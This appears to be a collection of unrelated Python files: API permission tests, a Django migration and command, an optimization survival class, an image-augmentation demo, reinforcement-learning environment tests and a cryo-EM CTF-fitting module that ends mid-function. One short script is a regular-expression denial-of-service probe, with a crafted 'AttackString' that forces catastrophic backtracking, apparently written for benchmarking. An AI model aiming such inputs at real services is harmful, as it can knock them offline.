('worker', True, True), ('worker', False, False),
])
def test_member_get_job_annotations(self, org, role, job_staff, is_allow,
jobs, tasks, find_job_staff_user, annotations, find_users):
users = find_users(org=org, role=role)
jobs, kwargs = filter_jobs(jobs, tasks, org)
username, jid = find_job_staff_user(jobs, users, job_staff)
if is_allow:
self._test_get_job_annotations_200(username,
jid, annotations['job'][str(jid)], **kwargs)
else:
self._test_get_job_annotations_403(username, jid, **kwargs)
@pytest.mark.parametrize('org', [1])
@pytest.mark.parametrize('privilege, is_allow', [
('admin', True), ('business', False), ('worker', False), ('user', False)
])
def test_non_member_get_job_annotations(self, org, privilege, is_allow,
jobs, tasks, find_job_staff_user, annotations, find_users):
users = find_users(privilege=privilege, exclude_org=org)
jobs, kwargs = filter_jobs(jobs, tasks, org)
username, job_id = find_job_staff_user(jobs, users, False)
kwargs = {'org_id': org}
if is_allow:
self._test_get_job_annotations_200(username,
job_id, annotations['job'][str(job_id)], **kwargs)
else:
self._test_get_job_annotations_403(username, job_id, **kwargs)
class TestPatchJobAnnotations:
_ORG = 2
    def _test_check_response(self, is_allow, response, data=None):
if is_allow:
assert response.status_code == HTTPStatus.OK
assert DeepDiff(data, response.json(),
exclude_paths="root['version']") == {}
else:
assert response.status_code == HTTPStatus.FORBIDDEN
@pytest.fixture(scope='class')
def request_data(self, annotations):
def get_data(jid):
data = annotations['job'][str(jid)].copy()
data['shapes'][0].update({'points': [2.0, 3.0, 4.0, 5.0, 6.0, 7.0]})
data['version'] += 1
return data
return get_data
@pytest.mark.parametrize('org', [2])
@pytest.mark.parametrize('role, job_staff, is_allow', [
('maintainer', False, True), ('owner', False, True),
('supervisor', False, False), ('worker', False, False),
('maintainer', True, True), ('owner', True, True),
('supervisor', True, True), ('worker', True, True)
])
def test_member_update_job_annotations(self, org, role, job_staff, is_allow,
find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
users = find_users(role=role, org=org)
jobs = jobs_by_org[org]
filtered_jobs = filter_jobs_with_shapes(jobs)
username, jid = find_job_staff_user(filtered_jobs, users, job_staff)
data = request_data(jid)
response = patch_method(username, f'jobs/{jid}/annotations',
data, org_id=org, action='update')
        self._test_check_response(is_allow, response, data)
@pytest.mark.parametrize('org', [2])
@pytest.mark.parametrize('privilege, is_allow', [
('admin', True), ('business', False), ('worker', False), ('user', False)
])
def test_non_member_update_job_annotations(self, org, privilege, is_allow,
find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
users = find_users(privilege=privilege, exclude_org=org)
jobs = jobs_by_org[org]
filtered_jobs = filter_jobs_with_shapes(jobs)
username, jid = find_job_staff_user(filtered_jobs, users, False)
data = request_data(jid)
response = patch_method(username, f'jobs/{jid}/annotations', data,
org_id=org, action='update')
        self._test_check_response(is_allow, response, data)
@pytest.mark.parametrize('org', [''])
@pytest.mark.parametrize('privilege, job_staff, is_allow', [
('admin', True, True), ('admin', False, True),
('business', True, True), ('business', False, False),
('worker', True, True), ('worker', False, False),
('user', True, True), ('user', False, False)
])
def test_user_update_job_annotations(self, org, privilege, job_staff, is_allow,
find_job_staff_user, find_users, request_data, jobs_by_org, filter_jobs_with_shapes):
users = find_users(privilege=privilege)
jobs = jobs_by_org[org]
filtered_jobs = filter_jobs_with_shapes(jobs)
username, jid = find_job_staff_user(filtered_jobs, users, job_staff)
data = request_data(jid)
response = patch_method(username, f'jobs/{jid}/annotations', data,
org_id=org, action='update')
        self._test_check_response(is_allow, response, data)
class TestPatchJob:
_ORG = 2
@pytest.fixture(scope='class')
def find_task_staff_user(self, is_task_staff):
def find(jobs, users, is_staff):
for job in jobs:
for user in users:
if is_staff == is_task_staff(user['id'], job['task_id']):
return user, job['id']
return None, None
return find
@pytest.fixture(scope='class')
def expected_data(self, jobs, users):
keys = ['url', 'id', 'username', 'first_name', 'last_name']
def find(job_id, assignee_id):
data = jobs[job_id].copy()
data['assignee'] = dict(filter(lambda a: a[0] in keys,
users[assignee_id].items()))
return data
return find
@pytest.fixture(scope='class')
def new_assignee(self, jobs, tasks, assignee_id, org_staff):
def find_new_assignee(jid, user_id):
members = org_staff(tasks[jobs[jid]['task_id']]['organization'])
members -= {assignee_id(jobs[jid]), user_id}
return members.pop()
return find_new_assignee
@pytest.mark.parametrize('org', [2])
@pytest.mark.parametrize('role, task_staff, is_allow', [
('maintainer', False, True), ('owner', False, True),
('supervisor', False, False), ('worker', False, False),
('maintainer', True, True), ('owner', True, True),
('supervisor', True, True), ('worker', True, True)
])
def test_member_update_job_assignee(self, org, role, task_staff, is_allow,
find_task_staff_user, find_users, jobs_by_org, new_assignee, expected_data):
users, jobs = find_users(role=role, org=org), jobs_by_org[org]
user, jid = find_task_staff_user(jobs, users, task_staff)
assignee = new_assignee(jid, user['id'])
response = patch_method(user['username'], f'jobs/{jid}',
{'assignee': assignee}, org_id=self._ORG)
if is_allow:
assert response.status_code == HTTPStatus.OK
assert DeepDiff(expected_data(jid, assignee), response.json()) == {}
else:
assert response.status_code == HTTPStatus.FORBIDDEN
|
# Generated by Django 3.0.3 on 2020-02-11 20:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('polls', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='choice',
name='votes',
field=models.IntegerField(default=0),
),
]
|
import numpy as np
from pymoo.core.survival import Survival
from pymoo.util.nds.non_dominated_sorting import NonDominatedSorting
from pymoo.util.randomized_argsort import randomized_argsort
# ---------------------------------------------------------------------------------------------------------
# Survival Selection
# ---------------------------------------------------------------------------------------------------------
class RankAndNoveltySurvival(Survival):
def __init__(self, nds=None) -> None:
super().__init__(filter_infeasible=True)
self.nds = nds if nds is not None else NonDominatedSorting()
def _do(self, problem, pop, *args, n_survive=None, **kwargs):
# get the objective space values and objects
F = pop.get("F").astype(float, copy=False)
# the final indices of surviving individuals
survivors = []
# do the non-dominated sorting until splitting front
fronts = self.nds.do(F, n_stop_if_ranked=n_survive)
for k, front in enumerate(fronts):
# calculate the novelty of the front
novelty_of_front = get_unaligned_novelty(pop[front])
            # save rank and novelty (stored under the "crowding" key) in the individual class
for j, i in enumerate(front):
pop[i].set("rank", k)
pop[i].set("crowding", novelty_of_front[j])
            # current front sorted by novelty if splitting
if len(survivors) + len(front) > n_survive:
I = randomized_argsort(novelty_of_front, order='descending', method='numpy')
I = I[:(n_survive - len(survivors))]
# otherwise take the whole front unsorted
else:
I = np.arange(len(front))
# extend the survivors by all or selected individuals
survivors.extend(front[I])
return pop[survivors]
def get_unaligned_novelty(pop):
return np.array([x_i.X.unaligned_novelty_metric for x_i in pop])
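# Hedged usage sketch (commented out because it needs a problem whose decision
# variables expose an `unaligned_novelty_metric` attribute, as required by
# get_unaligned_novelty above; `MyNoveltyProblem` is hypothetical):
#
#     from pymoo.algorithms.moo.nsga2 import NSGA2
#     from pymoo.optimize import minimize
#     algorithm = NSGA2(pop_size=100, survival=RankAndNoveltySurvival())
#     res = minimize(MyNoveltyProblem(), algorithm, ("n_gen", 50), seed=1)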
|
from unittest import TestCase, skipIf
class TestAll(TestCase):
def test_passing(self):
pass
def test_erroring(self):
raise Exception("Ima broke")
def test_failing(self):
self.assertEquals(2 + 2 * 2, 8)
@skipIf(2 > 1, "Skip everytime")
def test_skipped(self):
pass
|
# 6851
# ^[a-zA-Z0-9]+(([_][a-zA-Z0-9])?[a-zA-Z0-9]*)*$
# EXPONENT
# nums:4
# EXPONENT AttackString:"a"+"0"*32+"!1 __NQ"
import re
from time import perf_counter
regex = """^[a-zA-Z0-9]+(([_][a-zA-Z0-9])?[a-zA-Z0-9]*)*$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
ATTACK = "a" + "0" * i * 1 + "!1 __NQ"
LEN = len(ATTACK)
BEGIN = perf_counter()
m = REGEX.search(ATTACK)
# m = REGEX.match(ATTACK)
DURATION = perf_counter() - BEGIN
print(f"{i *1}: took {DURATION} seconds!")
|
"""
This must be run only after seed_permissions_roles.py!
Creates default roles for all users currently in the database. Just runs through
Enrollments.
"""
from django.core.management.base import BaseCommand
from common.djangoapps.student.models import CourseEnrollment
from openedx.core.djangoapps.django_comment_common.models import assign_default_role_on_enrollment
class Command(BaseCommand): # lint-amnesty, pylint: disable=missing-class-docstring
    help = 'Seed default permissions and roles.'
def handle(self, *args, **options):
print('Updated roles for ', end=' ')
for i, enrollment in enumerate(CourseEnrollment.objects.filter(is_active=1), start=1):
assign_default_role_on_enrollment(None, enrollment)
if i % 1000 == 0:
print(f'{i}...', end=' ')
print()
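# Example invocation (the command name is taken from this file's module name,
# which is not shown here; "assign_forum_roles" below is only a placeholder):
#     python manage.py assign_forum_roles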
|
import numpy as np
import cv2
import imgaug as ia
import imgaug.augmenters as iaa
from imgaug.augmentables import Keypoint, KeypointsOnImage
ia.seed(1)
image = ia.quokka(size=(256, 256))
kps = KeypointsOnImage([
Keypoint(x=65, y=100),
Keypoint(x=75, y=200),
Keypoint(x=100, y=100),
Keypoint(x=200, y=80)
], shape=image.shape)
seq = iaa.Sequential([
iaa.Multiply((1.2, 1.5)), # change brightness, doesn't affect keypoints
iaa.Affine(
rotate=10,
scale=(0.5, 0.7)
) # rotate by exactly 10deg and scale to 50-70%, affects keypoints
])
# Augment keypoints and images.
image_aug, kps_aug = seq(image=image, keypoints=kps)
# print coordinates before/after augmentation (see below)
# use after.x_int and after.y_int to get rounded integer coordinates
for i in range(len(kps.keypoints)):
before = kps.keypoints[i]
after = kps_aug.keypoints[i]
print("Keypoint %d: (%.8f, %.8f) -> (%.8f, %.8f)" % (
i, before.x, before.y, after.x, after.y)
)
# image with keypoints before/after augmentation (shown below)
image_before = kps.draw_on_image(image, size=7)
image_after = kps_aug.draw_on_image(image_aug, size=7)
def main():
imgs = np.zeros((1, 100, 100, 3), dtype=np.uint8) + 255
bbs = ia.BoundingBoxesOnImage([
ia.BoundingBox(x1=0, x2=50, y1=0, y2=50)
], shape=imgs.shape[1:])
aug = iaa.Sequential([
iaa.Crop(px=10),
iaa.Pad(px=10, pad_cval=128),
iaa.Affine(scale=0.5, cval=0)
])
aug_det = aug.to_deterministic()
imgs_aug = aug_det.augment_images(imgs)
bbs_aug = aug_det.augment_bounding_boxes([bbs])
print("bbs:")
for bbs_aug_i in bbs_aug[0].bounding_boxes:
print(bbs_aug_i)
cv2.imshow('orig',imgs)
cv2.imshow('aug',bbs_aug[0].draw_on_image(imgs_aug[0]))
cv2.waitKey()
if __name__ == "__main__":
main()
|
from typing import Optional
import gym
import pytest
from ray.rllib.env.wrappers.moab_wrapper import _MoabBaseWrapper
from ray.tune.registry import ENV_CREATOR, _global_registry
@pytest.mark.parametrize("env_name, iterations",
[
("MoabMoveToCenterSim-v0", 10),
("MoabMoveToCenterPartialObservableSim-v0", 10),
("MoabMoveToCenterAvoidObstacleSim-v0", 3),],
)
@pytest.mark.parametrize("randomize_ball", [True, False])
@pytest.mark.parametrize("randomize_obstacle", [True, False])
@pytest.mark.parametrize("seed", [None, 1])
class TestMoabWrapper:
@pytest.fixture
def env_name(self) -> str:
return "MoabMoveToCenterSim-v0"
@pytest.fixture
def randomize_ball(self) -> bool:
return False
@pytest.fixture
def randomize_obstacle(self) -> bool:
return False
@pytest.fixture
def seed(self) -> Optional[int]:
return None
@pytest.fixture
def iterations(self) -> int:
return 3
@pytest.fixture
def moab_env(self,
env_name: str,
randomize_ball: bool,
randomize_obstacle: bool,
seed: Optional[int]) -> _MoabBaseWrapper:
env_creator = _global_registry.get(ENV_CREATOR, env_name)
env_config = {
"randomize_ball": randomize_ball,
"randomize_obstacle": randomize_obstacle,
"seed": seed,
}
return env_creator(env_config)
def test_observation_space(self, moab_env: _MoabBaseWrapper, iterations: int):
obs = moab_env.reset()
        assert moab_env.observation_space.contains(obs), \
            f"{moab_env.observation_space} doesn't contain {obs}"
new_obs, _, _, _ = moab_env.step(moab_env.action_space.sample())
assert moab_env.observation_space.contains(new_obs)
def test_action_space_conversion(self, moab_env: _MoabBaseWrapper, iterations: int):
assert isinstance(moab_env.action_space, gym.spaces.Box)
moab_env.reset()
action = moab_env.action_space.sample()
moab_env.step(action)
def test_few_iterations(self, moab_env: _MoabBaseWrapper, iterations: int):
moab_env.reset()
for _ in range(iterations):
moab_env.step(moab_env.action_space.sample())
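# Standalone sketch (outside pytest; mirrors what the moab_env fixture does):
# build the env through Ray's registry and roll it for a few random steps.
if __name__ == "__main__":
    creator = _global_registry.get(ENV_CREATOR, "MoabMoveToCenterSim-v0")
    env = creator({"randomize_ball": False, "randomize_obstacle": False, "seed": 1})
    obs = env.reset()
    for _ in range(3):
        obs, reward, done, info = env.step(env.action_space.sample())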
|
"""
Functions related to ctf.
Currently only few that allow running ctffind from console or notebook.
Work in progress.
# Author: Vladan Lucic (Max Planck Institute for Biochemistry)
# $Id$
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from builtins import zip
from builtins import str
from builtins import range
from builtins import object
from past.utils import old_div
from past.builtins import basestring
__version__ = "$Revision$"
import os
import subprocess
import logging
import numpy as np
import matplotlib.pyplot as plt
import pyto.util.nested
from pyto.io.image_io import ImageIO
from pyto.grey.image import Image
class Ctf(object):
"""
Determination of CTF by external tools
"""
    # prefix for validation attributes obtained from gctf
validation_prefix = "validation_"
# default params ctffind 4.0.17, also 4.1
default_params_ctffind = {
"pixel_a":1, "cs":2.7, "amp":0.1, "phase":"no", 'box':512,
'min_res':30, 'max_res':5, 'min_def':5000, 'max_def':50000,
'def_step':500, 'astig':100, 'known_astig':'no', 'slow_search':'yes',
'restraint_astig':'yes', 'tolerated_astig':200,
'phase':'yes', 'min_phase':0, 'max_phase':2, 'phase_step':0.1,
'expert':'no'}
# parameter list for ctffind 4.0.17 (currently not used, left for reference)
param_names_ctffind_4_0 = [
'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
'min_def', 'max_def', 'def_step', 'astig', 'phase',
'min_phase', 'max_phase', 'phase_step']
# default parameter list for 4.1; consistent with default_params_ctffind
param_names_ctffind_4_1 = [
'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
'min_def', 'max_def', 'def_step', 'known_astig', 'slow_search',
'restraint_astig','tolerated_astig',
'phase', 'min_phase', 'max_phase', 'phase_step', 'expert']
def __init__(self):
"""
Initializes common attributes
"""
# attributes
self.image_path_orig = []
self.image_inds = []
self.image_path = []
self.ctf_path = []
self.phases = []
self.defoci_1 = []
self.defoci_2 = []
self.defoci = []
self.resolution = []
self.pixel_a = []
self.angle = []
@classmethod
def find(
cls, image_dir, image_prefix, ctf_dir, params, pixel_a=None,
flatten='auto', tool='ctffind', executable=None,
param_file='ctf_params.txt', fast=False, max_images=None,
plot_ctf=True, plot_ps=True, b_plot=True, exp_f_plot=False,
show_legend=True, plot_phases=True, plot_defoci=True,
plot_resolution=True, print_results=True, print_validation=False):
"""
Determines and shows CTF fits for multiple images.
        All files located in (arg) image_dir whose names start with (arg)
image_prefix and that have extension mrc, em or st are selected
for the ctf determination.
If a selected file is 3D (image stack), and arg flatten is True or
'auto', all z-slices are summed up (saved in ctf_dir) and the ctf
        is determined on the resulting (flattened) image. Alternatively, if arg
flatten is False, z-slices are extracted, saved in ctf_dir and
analyzed separately.
        All resulting files, as well as the extracted or flattened images
(in case of 3D files) are saved or moved to directory ctf_dir.
CTF is determined using external tools. Current options are:
- CTFFIND
- gCTF
These tools have to be installed externally.
Parameters for the ctf tools are specified as a dictionary (arg params).
Parameters used for both ctffind and gctf are:
- 'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
'min_def', 'max_def', 'def_step', 'astig', 'phase',
'min_phase', 'max_phase', 'phase_step'
Voltage ('voltage') should always be specified. The pixel size
(pixel_a) has to be specified in case it can not be read from
the image header. All other parameters are optional, if they are
        not specified the ctffind / gctf default values are used.
The default values should be fine for single particle images.
Parameter recommendations for phase plate images are given in
the ctffind / gctf documentation.
In case of ctffind, arg params can also be a list containing the
parameter values in the same order as specified above, starting
with voltage.
Important for ctffind: Because the required arguments differ between
versions 4.0 and 4.1, as well as depend on values specified, it is
not guaranteed that the dictionary form of arg params will work.
In case of problems, specify params as a list.
In addition, all other gctf arguments can also be specified
(without '--'). It is suggested to use:
'do_EPA':'', 'do_validation':''
        Parameter units are the same as in the ctf determination tools.
Intended for use in an environment such as Jupyter notebook.
Arguments:
- image_dir: directory where images reside
- image prefix: beginning of image file(s)
- ctf_dir: directory where the ctf determination results and
extracted images are saved
- pixel_a: pixel size in A
- params: ctf determination parameters
        - flatten: indicates whether 3D images should be flattened (True or
'auto') or not (False).
        - tool: name of the ctf determination tool
- executable: ctf tool executable
- param_file: name of the temporary parameter file
- fast: flag indicating whether ctffind --fast option is used
- print_results: flag indicating if phase and defoci found
are printed for each analyzed image
- plot_ctf: flag indicating whether ctf is plotted for each
analyzed image
- show_legend: flag indicating whether a legend is shown on ctf graphs
        - plot_phases, plot_defoci: flags indicating whether graphs containing
          phases and defoci of all images, respectively, are plotted
        - max_images: max number of images analyzed, for testing
Returns an instance of this class. The following attributes are all
lists where elements correspond to individual images:
- image_path_orig: image path of the input file
- image_path: image path of the image that is actually used
        to determine ctf. It differs from image_path_orig if the original
(input) image is a stack that is flattened or used to extract slices
- image_inds: index of a slice extracted for a stack
- ctf_path: path of the ctf fit image
- defocus_1, defocus_2, defocus: defoci along the two axes and the
mean defocus in um
- angle: defocus (astigmatism) angle
- phase: phase shift in multiples of pi
- resolution: resolution in nm
- ccc: correlation coefficient
- pixel_a: pixel size in A
- b_factor: b-factor (gctf only)
"""
# initialize
index = 0
new = cls()
print_head = True
if plot_ctf and fast:
print(
"Warning: CTF will not be plotted because fast execution"
+ " was chosen")
# check which ctf tool to use
if tool == 'ctffind':
if executable is None:
executable = 'ctffind'
elif tool == 'gctf':
if executable is None:
executable = 'gctf'
else:
raise ValueError(
"CTF determination tool " + str(tool) + " was not understood.")
new.tool = tool
# cftfind on all images
file_list = np.sort(os.listdir(image_dir))
for image_name in file_list:
# skip files that are not images
if not image_name.startswith(image_prefix): continue
if not (image_name.endswith('.mrc') or image_name.endswith('.st')
or image_name.endswith('.em')):
continue
if image_name.endswith('ctf.mrc'): continue
# set input image path
image_path = os.path.join(image_dir, image_name)
            # figure out whether to flatten or not (just once; assume all files
# are the same)
im_io = ImageIO(file=image_path)
if image_name.endswith('.st'):
im_io.readHeader(fileFormat='mrc')
else:
im_io.readHeader()
z_dim = im_io.shape[2]
n_digits = int(np.ceil(np.log10(z_dim)))
if isinstance(flatten, bool):
pass
elif isinstance(flatten, basestring) and (flatten == 'auto'):
if z_dim > 1:
flatten = True
else:
flatten = False
else:
raise ValueError(
"Argument flatten: "+ str(flatten) +" was not understood.")
# load stack and prepare image name, if need to extract images
if (z_dim > 1) and not flatten:
image_dir, image_name = os.path.split(image_path)
image_base, image_extension = image_name.rsplit('.', 1)
image_name_new_tmplt = (
image_base + '_%0' + str(n_digits) + 'd.mrc')
if image_name.endswith('.st'):
stack = Image.read(
image_path, memmap=True, fileFormat='mrc')
else:
stack = Image.read(image_path, memmap=True)
else:
image_path_to_read = image_path
# find ctf of the current image or stack
for image_in_stack_ind in range(z_dim):
# extract and save images if needed
if (z_dim > 1) and not flatten:
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
image_path_to_read = os.path.join(
ctf_dir, (image_name_new_tmplt % image_in_stack_ind))
one_image = Image()
one_image.data = stack.data[:,:,image_in_stack_ind]
one_image.write(
file=image_path_to_read, pixel=stack.pixelsize)
                # save image path related data
new.image_path_orig.append(image_path)
new.image_inds.append(image_in_stack_ind)
new.image_path.append(image_path_to_read)
# find ctf
if tool == 'ctffind':
# ctffind
res_one = cls.ctffind(
image_path=image_path_to_read, flatten=flatten,
ctf_dir=ctf_dir, executable=executable,
pixel_a=pixel_a, params=params,
param_file=param_file, fast=fast, print_head=print_head,
print_results= print_results,
plot_ctf=plot_ctf, show_legend=show_legend)
elif tool == 'gctf':
# gctf
res_one = cls.gctf(
image_path=image_path_to_read, params=params,
pixel_a=pixel_a, flatten=flatten, ctf_dir=ctf_dir,
executable=executable,
                        plot_ctf=plot_ctf, plot_ps=plot_ps, b_plot=b_plot,
exp_f_plot=exp_f_plot, show_legend=show_legend,
print_results=print_results,
print_head=print_head,
print_validation=print_validation)
# save gctf specific data
try:
new.b_factor.append(res_one['b_factor'])
except AttributeError:
new.b_factor = [res_one['b_factor']]
for name, value in list(res_one.items()):
if name.startswith(cls.validation_prefix):
try:
previous_val = getattr(new, name)
previous_val.append(value)
setattr(new, name, previous_val)
except AttributeError:
setattr(new, name, [value])
else:
raise ValueError("Sorry tool: " + tool + " was not found.")
# save data common for ctffind and gctf
new.phases.append(res_one["phase"])
new.defoci.append(res_one["defocus"])
new.defoci_1.append(res_one['defocus_1'])
new.defoci_2.append(res_one['defocus_2'])
new.resolution.append(res_one['resolution'])
new.pixel_a.append(res_one['pixel_a'])
new.angle.append(res_one['angle'])
new.ctf_path.append(res_one['ctf_path'])
# keep track of n images processed so far
print_head = False
index = index + 1
if (max_images is not None) and (index > max_images): break
if flatten: break
# plot phases
if plot_phases:
plt.figure()
plt.bar(list(range(index)), new.phases)
plt.plot([0, index], [0.5, 0.5], 'r--')
            plt.ylabel(r'Phase shift [$\pi$]')
plt.xlabel('Images')
plt.title("Phase shift summary")
# plot defocus
if plot_defoci:
plt.figure()
plt.bar(list(range(index)), new.defoci)
            plt.ylabel(r'Defocus [$\mu m$]')
plt.xlabel('Images')
plt.title("Defocus summary")
# plot resolution
if plot_resolution:
plt.figure()
plt.bar(list(range(index)), new.resolution)
plt.ylabel('Resolution [nm]')
plt.xlabel('Images')
plt.title("Resolution summary")
return new
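    # Hedged usage sketch (not part of the original module): how find() might
    # be called from a notebook. The class name, directory names, pixel size
    # and params values below are hypothetical placeholders; the actual class
    # name is outside this excerpt.
    #
    #   ctf = CtfDetection.find(
    #       image_dir='tomograms/', image_prefix='tomo_',
    #       ctf_dir='tomograms/ctf/', pixel_a=1.33,
    #       params={'voltage': 300, 'cs': 2.7, 'amp': 0.1, 'phase': 'no'},
    #       tool='ctffind', plot_ctf=False, plot_defoci=True)
    #   print(ctf.defoci)      # mean defocus per image, in um
    #   print(ctf.resolution)  # fitted resolution per image, in nm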
@classmethod
def ctffind(
cls, image_path, ctf_dir, params, pixel_a=None, flatten=False,
executable='ctffind', param_file='ctf_params.txt', fast=False,
print_results=True, print_head=True,
plot_ctf=True, show_legend=True):
"""
Determines and shows CTF fits of one image using ctffind.
See find() for more information.
"""
# make ctf dir if doesn't exist
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
# find pixel size
if pixel_a is None:
pixel_a = cls.read_pixel_size(image_path=image_path)
# flatten frame stack
if flatten:
image_path = cls.flatten_stack(
stack_path=image_path, flat_dir=ctf_dir)
# default params ctffind 4.0.17 (moved to top of this file anyway)
#default_params = {
# "pixel_a":1, "cs":2.7, "amp":0.1, "phase":"no", 'box':512,
# 'min_res':30, 'max_res':5, 'min_def':5000, 'max_def':50000,
# 'def_step':500, 'astig':100, 'phase':'no', 'min_phase':0,
# 'max_phase':2, 'phase_step':0.1}
#param_names = [
# 'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
# 'min_def', 'max_def', 'def_step', 'astig', 'phase',
# 'min_phase', 'max_phase', 'phase_step']
# keep params if list, add default if dict
        if isinstance(params, list):
            comb_params = [pixel_a] + params
        elif isinstance(params, dict):
            params_dict = cls.default_params_ctffind.copy()
            params_dict.update(params)
            params_dict['pixel_a'] = pixel_a
            param_names = cls.make_param_names_ctffind(params=params_dict)
            comb_params = [params_dict[name] for name in param_names]
        else:
            raise ValueError(
                "Argument params has to be a list or a dict, but got "
                + str(type(params)) + ".")
# set ctffind out paths
image_dir, image_name = os.path.split(image_path)
image_base, image_extension = image_name.rsplit('.', 1)
ctf_path = os.path.join(ctf_dir, image_base + '_ctf.mrc')
ctf_txt_path = os.path.join(ctf_dir, image_base + '_ctf.txt')
ctf_avrot_path = os.path.join(ctf_dir, image_base + '_ctf_avrot.txt')
        # write ctf parameters to a file
        param_path = os.path.join(ctf_dir, param_file)
        with open(param_path, 'w') as pf:
            pf.write(image_path + '\n')
            pf.write(ctf_path + '\n')
            str_params = [str(par) + '\n' for par in comb_params]
            pf.writelines(str_params)
            pf.flush()
# execute ctffind
# shell commands that work:
# - ctffind < param_path
# - cat params.txt | ctffind
#print(image)
if fast:
ctf_cmd = [executable, '--fast']
else:
ctf_cmd = [executable]
try:
subprocess.check_call(ctf_cmd, stdin=open(param_path))
except Exception as exc:
# workaround for ctffind command returning code 255 (4.1.8, 09.2018)
logging.debug('CalledProcessError: ' + str(exc))
# read results:
ctf_txt = np.loadtxt(ctf_txt_path)
results = {
"defocus_1":ctf_txt[1]/10000., "defocus_2":ctf_txt[2]/10000.,
"angle" : ctf_txt[3], "phase":old_div(ctf_txt[4],np.pi),
"ccc" : ctf_txt[5], "resolution" : ctf_txt[6] / 10.,
'pixel_a':pixel_a}
results['defocus'] = (results['defocus_1'] + results['defocus_2']) / 2.
results['ctf_path'] = ctf_path
# prepare header for defoci and phases
if print_head:
            left_space = ' ' * old_div((len(image_name) - 5), 2)
            right_space = ' ' * old_div((len(image_name) - 4), 2)
head_1 = (
left_space + "Image" + right_space +
" Defocus 1 Defocus 2 Phase Resolution")
head_2 = (
left_space + " " + right_space +
" um um [pi] nm ")
# prepare results
if print_results:
data_format = '%s %6.2f %6.2f %6.2f %6.2f '
data_vars = (
image_name, results["defocus_1"], results["defocus_2"],
results["phase"], results["resolution"])
# print
if print_head:
print(head_1)
print(head_2)
if print_results:
print(data_format % data_vars)
# plot ctf
if plot_ctf:
plt.figure()
avrot_data = np.loadtxt(ctf_avrot_path)
x_data = avrot_data[0] / pixel_a
plt.plot(x_data, avrot_data[2], 'g-', label='PS')
plt.plot(
x_data, avrot_data[3], color='orange', linewidth=2,
label='CTF fit')
plt.plot(
x_data, avrot_data[4], color='blue', linewidth=2,
label='Quality')
plt.ylim(-0.1, 1.1)
            plt.xlabel("Spatial frequency [1/A]")
plt.ylabel("Amplitude")
if show_legend: plt.legend()
plt.show()
return results
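    # Illustrative sketch (an assumption, not taken from a real run): with
    # dict-style params, the temporary parameter file written above holds one
    # answer per line, in the order given by make_param_names_ctffind(), and
    # is fed to ctffind on stdin. It might look roughly like:
    #
    #   /path/to/image.mrc      <- input image
    #   /path/to/image_ctf.mrc  <- diagnostic (ctf fit) output
    #   1.33                    <- pixel_a
    #   300                     <- voltage
    #   2.7                     <- cs
    #   ...                     <- remaining answers (amp, box, min_res, ...)
    #
    # which is equivalent to running "ctffind < ctf_params.txt" in a shell,
    # as noted in the comment above the subprocess call.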
@classmethod
def make_param_names_ctffind(cls, params):
"""
        Makes a list of parameter names suitable for ctffind 4.1, in
        accordance with the specified params.
Argument:
- params: dict of parameters
Returns parameter list
"""
# optional parts
if params['restraint_astig'] in ['yes', 'y']:
restraint_astig_part = ['restraint_astig','tolerated_astig']
else:
restraint_astig_part = ['restraint_astig']
if (params['phase'] == 'yes') or (params['phase'] == 'y'):
phase_part = ['phase', 'min_phase', 'max_phase', 'phase_step']
else:
phase_part = ['phase']
# combine
param_names = (
cls.param_names_ctffind_4_1[:12] + restraint_astig_part
+ phase_part + ['expert'])
return param_names
@classmethod
def gctf(
cls, image_path, ctf_dir, params, pixel_a=None, flatten=False,
executable='gctf', plot_ps=True, plot_ctf=True,
b_plot=True, exp_f_plot=False, show_legend=True,
print_results=True, print_head=True, print_validation=False):
"""
Determines and shows CTF fits of one image using gctf.
See find() for more information.
"""
# make ctf dir if doesn't exist
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
# find pixel size
if pixel_a is None:
pixel_a = cls.read_pixel_size(image_path=image_path)
# flatten frame stack if needed
if flatten:
image_path = cls.flatten_stack(
stack_path=image_path, flat_dir=ctf_dir)
# prepare parameters
gctf_names = {
'pixel_a':'apix', 'voltage':'kV', 'cs':'Cs', 'amp':'ac',
'box':'boxsize', 'min_res':'resL', 'max_res':'resH',
'min_def':'defL', 'max_def':'defH', 'def_step':'defS',
'astig':'astm', 'phase':'phase', 'min_phase':'phase_shift_L',
'max_phase':'phase_shift_H', 'phase_step':'phase_shift_S'}
params["pixel_a"] = pixel_a
params_list = [
["--" + gctf_names.get(key, key), str(val)]
for key, val in list(params.items())]
params_list = pyto.util.nested.flatten(params_list)
params_list = [par for par in params_list if len(par) > 0]
#print(params_list)
        # execute gctf
ctf_cmd = [executable] + params_list + [image_path]
call_status = subprocess.check_call(ctf_cmd)
# set gctf out paths
image_dir, image_name = os.path.split(image_path)
image_base, image_extension = image_name.rsplit('.', 1)
epa_path = os.path.join(ctf_dir, image_base + '_EPA.log')
gctf_path = os.path.join(ctf_dir, image_base + '_gctf.log')
ctf_path = os.path.join(ctf_dir, image_base + '.ctf')
tmp_epa_path = os.path.join(image_dir, image_base + '_EPA.log')
tmp_gctf_path = os.path.join(image_dir, image_base + '_gctf.log')
tmp_ctf_path = os.path.join(image_dir, image_base + '.ctf')
# move generated files to ctf_dir
if image_dir != ctf_dir:
call_status = subprocess.check_call(['mv', tmp_epa_path, epa_path])
call_status = subprocess.check_call(
['mv', tmp_gctf_path, gctf_path])
call_status = subprocess.check_call(['mv', tmp_ctf_path, ctf_path])
call_status = subprocess.check_call(
['mv', 'micrographs_all_gctf.star', ctf_dir])
# read results
in_last_cycle = False
in_last_cycle_data = False
validation_lines = []
for line in open(gctf_path):
# read defocus
if line.find('LAST CYCLE') >= 0:
in_last_cycle = True
#print line.strip('\n')
elif in_last_cycle and (line.find('Defocus_U') >= 0):
#print line.strip('\n')
head_split = line.strip().split()
in_last_cycle_data = True
elif in_last_cycle_data:
#print line.strip('\n')
data_split = line.strip().split()[:-2]
